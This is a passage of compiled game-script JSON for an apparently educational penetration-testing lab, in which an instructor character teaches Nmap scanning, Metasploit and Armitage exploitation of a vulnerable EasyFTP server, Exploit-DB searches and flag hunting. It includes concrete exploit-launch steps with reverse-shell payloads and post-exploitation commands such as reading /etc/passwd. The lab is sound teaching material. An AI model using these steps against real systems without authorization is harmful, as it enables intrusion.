Nmap.","\n","^Results are automatically imported into the Metasploit database and displayed visually.","\n","^Any previously scanned hosts in the database will also appear automatically.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Armitage analyzes the operating system and services detected on each host.","\n","^First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor","\n","^Then click: Attacks → Find attacks","\n","^Armitage will match detected services to available 
exploits in Metasploit.","\n","^Right-click a host and select \"Attack\" to see suggested exploits categorized by service.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Right-click the target host and select \"Attack\"","\n","^Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret","\n","^Click \"Launch\" and Armitage will configure and run the exploit.","\n","^If successful, the host icon turns red showing it's compromised!","\n","^You can then right-click the compromised host to interact with shells or run post-exploitation modules.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Right-click the compromised (red) host.","\n","^Look for \"Meterpreter 1\" or \"Shell 1\" depending on the payload used.","\n","^Click \"Interact\" → \"Command shell\" to open a terminal.","\n","^You can now run commands like \"dir\" on Windows or \"ls\" on Linux.","\n","^Armitage also has menu options for common post-exploitation tasks.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"vulnerability_databases":[["^Beyond Metasploit, there are numerous online vulnerability databases you should know about.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.","\n","^Different databases have different focuses and information, so it's worth checking multiple sources.","\n","ev","str","^What are the main vulnerability databases?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What information do 
these databases provide?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Do all vulnerabilities have CVEs?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the most important ones:","\n","^CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.","\n","^NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.","\n","^SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.","\n","^Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Vulnerability databases typically include:","\n","^CVE numbers - unique identifiers for each vulnerability.","\n","^Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.","\n","^Affected versions - which specific software versions are vulnerable.","\n","^Technical descriptions of the vulnerability.","\n","^References to patches, advisories, and sometimes proof-of-concept code.","\n","^Information about whether exploits exist in the wild.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^No! 
This is an important point.","\n","^CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.","\n","^Sometimes researchers publish vulnerabilities before CVEs are assigned.","\n","^Some vendors have their own vulnerability identifiers.","\n","^Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.","\n","^This is why checking multiple sources and forums is important.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"exploit_db":[["^The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.","\n","^Kali Linux includes a local copy of the entire database!","\n","ev","str","^How do I search Exploit-DB online?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I use the local Exploit-DB copy?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What's searchsploit?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I use standalone exploits from Exploit-DB?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Visit exploit-db.com and use their search function.","\n","^You can search by software name, version, platform, or exploit type.","\n","^Each exploit listing includes the source code, often in Python, C, PHP, or other languages.","\n","^The database also categorizes exploits by type: remote, local, web application, DoS, etc.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^On Kali Linux, exploits are 
stored in /usr/share/exploitdb/","\n","^They're organized by platform: windows, linux, osx, etc.","\n","^You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Searchsploit is a command-line tool for searching the local Exploit-DB copy.","\n","^It's much faster and more convenient than manually searching files.","\n","^Basic usage: searchsploit easyftp","\n","^You can also use grep on the CSV file: grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^To download an exploit to your current directory: searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Standalone exploits often require some manual setup:","\n","^You might need to edit the source code to set the target IP address.","\n","^Some exploits require compilation (C/C++ code).","\n","^Python exploits might need specific library dependencies.","\n","^Read the exploit code comments carefully - they usually explain how to use it.","\n","^Always understand what an exploit does before running it!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"commands_reference":[["^Let me provide a comprehensive commands reference for this lab.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"commands_reference.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Initial 
Scanning:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.11.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Metasploit Database Setup:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^nmap -sV 10.X.X.2-3 (scan for two servers)","\n","^nmap -O -sV -p 1-65535 TARGET (comprehensive scan)","\n",{"->":".^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.11.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^msfconsole (start Metasploit console)","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Show me scanning from msfconsole","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Show me Metasploit scanning modules","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Show me searching for exploits","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Show me launching exploits","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Show me post-exploitation commands","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Show me Armitage commands","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Show me Exploit-DB commands","/str","/ev",{"*":".^.c-6","flg":4},{"c-0":["\n",[["ev",{"^->":"commands_reference.0.c-0.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Scanning from Msfconsole:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-0.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Database Queries:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-0.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > nmap -O -sV TARGET","\n","^msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^msf > db_import 
scan_output.xml","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-0.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^msf > hosts (show all hosts)","\n","^msf > services (show all services)","\n","^msf > services -p 21 (show services on port 21)","\n","^msf > services -p 21 -R (and set RHOSTS)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-1":["\n",[["ev",{"^->":"commands_reference.0.c-1.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Metasploit Port Scanners:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-1.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use auxiliary/scanner/portscan/ (TAB to see options)","\n","^msf > use auxiliary/scanner/portscan/tcp","\n","^msf auxiliary(tcp) > set RHOSTS TARGET","\n","^msf auxiliary(tcp) > set THREADS 10","\n","^msf auxiliary(tcp) > run","\n","^msf auxiliary(tcp) > services","\n","^msf auxiliary(tcp) > back","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-2":["\n",[["ev",{"^->":"commands_reference.0.c-2.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Searching for Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-2.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > help search","\n","^msf > search easyftp","\n","^msf > search type:exploit platform:Windows","\n","^msf > search type:exploit cve:2003-0352","\n","^msf > search buffer overflow","\n","^msf > search type:exploit platform:linux","\n","^msf > info 
exploit/windows/ftp/easyftp_cwd_fixret","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-3":["\n",[["ev",{"^->":"commands_reference.0.c-3.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Launching Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-3.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use exploit/windows/ftp/easyftp_cwd_fixret","\n","^msf exploit(...) > show options","\n","^msf exploit(...) > set RHOST TARGET_IP","\n","^msf exploit(...) > show payloads","\n","^msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp","\n","^msf exploit(...) > set LHOST YOUR_KALI_IP","\n","^msf exploit(...) > check (if supported)","\n","^msf exploit(...) > exploit","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-4":["\n",[["ev",{"^->":"commands_reference.0.c-4.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Post-Exploitation Commands (Windows):**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-4.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Post-Exploitation Commands (Linux):**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-4.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check privileges)","\n","^type C:pathtoflag.txt (read file)","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-4.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^ls -la (list files)","\n","^cat /etc/passwd (view user 
accounts)","\n","^whoami (current user)","\n","^cat flag (read flag file)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-5":["\n",[["ev",{"^->":"commands_reference.0.c-5.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Armitage Setup:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-5.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Armitage Workflow:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-5.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^armitage &","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-5.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^1. Hosts → Nmap Scan → Quick Scan (OS detect)","\n","^2. Armitage → Set Exploit Rank → Poor","\n","^3. Attacks → Find attacks","\n","^4. Right-click host → Attack → select exploit → Launch","\n","^5. 
Right-click compromised host → Interact → Command shell","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-6":["\n",[["ev",{"^->":"commands_reference.0.c-6.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Exploit Database:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-6.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^less /usr/share/exploitdb/files_exploits.csv","\n","^grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^searchsploit easyftp","\n","^searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"g-0":[{"->":"exploitation_hub"},null]}],null],"challenge_tips":[["^Let me give you practical tips for succeeding in the exploitation challenges.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"challenge_tips.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Finding Vulnerable Services:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"challenge_tips.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET","\n","^Pay close attention to service versions - specific version numbers are key to finding exploits.","\n","^Import results into Metasploit for easier targeting: db_nmap -sV TARGET","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Tips for exploiting the Windows server?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Tips for exploiting the Linux 
server?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Tips for using Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^General troubleshooting advice?","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Where are the flags?","/str","/ev",{"*":".^.c-4","flg":4},{"c-0":["\n","^The Windows server is running EasyFTP with a known vulnerability.","\n","^Search for it: search easyftp","\n","^Look for the module ending in \"cwd_fixret\"","\n","^Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp","\n","^Make sure to set LHOST to YOUR Kali IP (the host-only network address).","\n","^If the exploit fails, restart the Windows VM and try again.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The Linux server has multiple potentially vulnerable services.","\n","^Scan all ports to find everything running: nmap -sV -p- TARGET","\n","^Look for services like vsftpd, IRC, or other network services.","\n","^Search Metasploit for exploits matching those services.","\n","^Remember to use a Unix reverse shell payload: cmd/unix/reverse","\n","^Some Linux exploits are more reliable than others - you may need to try a few.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage is great for beginners because it suggests attacks automatically.","\n","^Make sure you set the exploit rank to \"Poor\" or you'll miss some exploits.","\n","^Don't just click the first suggested attack - read the module info to understand what it does.","\n","^Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.","\n","^If Armitage seems to hang, check the console tab at the bottom for error 
messages.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Always verify your IP addresses with \"show options\" before running exploits.","\n","^RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.","\n","^If services stop responding, restart the target VM - exploits often crash vulnerable services.","\n","^After successfully exploiting a service once, you'll need to restart the VM to exploit it again.","\n","^Be patient - some exploits take time to establish connections.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-4":["\n","^For the Windows server, look on a user's Desktop.","\n","^Navigate with: cd C:Users or cd C:Documents and Settings","\n","^List directories with: dir","\n","^Read flag files with: type flag.txt","\n","^For the Linux server, flags are typically in user home directories.","\n","^Navigate with: cd /home","\n","^List directories with: ls -la","\n","^Read flags with: cat flag","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"ready_for_practice":[["^Excellent! You're ready to start practical exploitation.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^You now understand how to move from scanning to exploitation - the core of penetration testing.","\n","^Remember: these techniques are powerful. 
Use them only for authorized security testing and defensive purposes.","\n","^In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.","\n","ev","str","^Any final advice before I start?","/str","/ev",{"*":".^.c-0","flg":4},{"c-0":["\n","^Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.","\n","^Don't rush. Take time to understand what each exploit does and why it works.","\n","^If something doesn't work, check your settings, restart the target, and try again.","\n","^Try both msfconsole and Armitage to see which you prefer.","\n","^Most importantly: always verify you're targeting the right system and have authorization!","\n","^Good luck, Agent ","ev",{"VAR?":"player_name"},"out","/ev","^. Time to put your skills to the test.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},{"->":"exploitation_hub"},null]}],null],"global decl":["ev",0,{"VAR=":"instructor_rapport"},0,{"VAR=":"exploitation_mastery"},"str","^Agent 0x00","/str",{"VAR=":"player_name"},"/ev","end",null]}],"listDefs":{}} \ No newline at end of file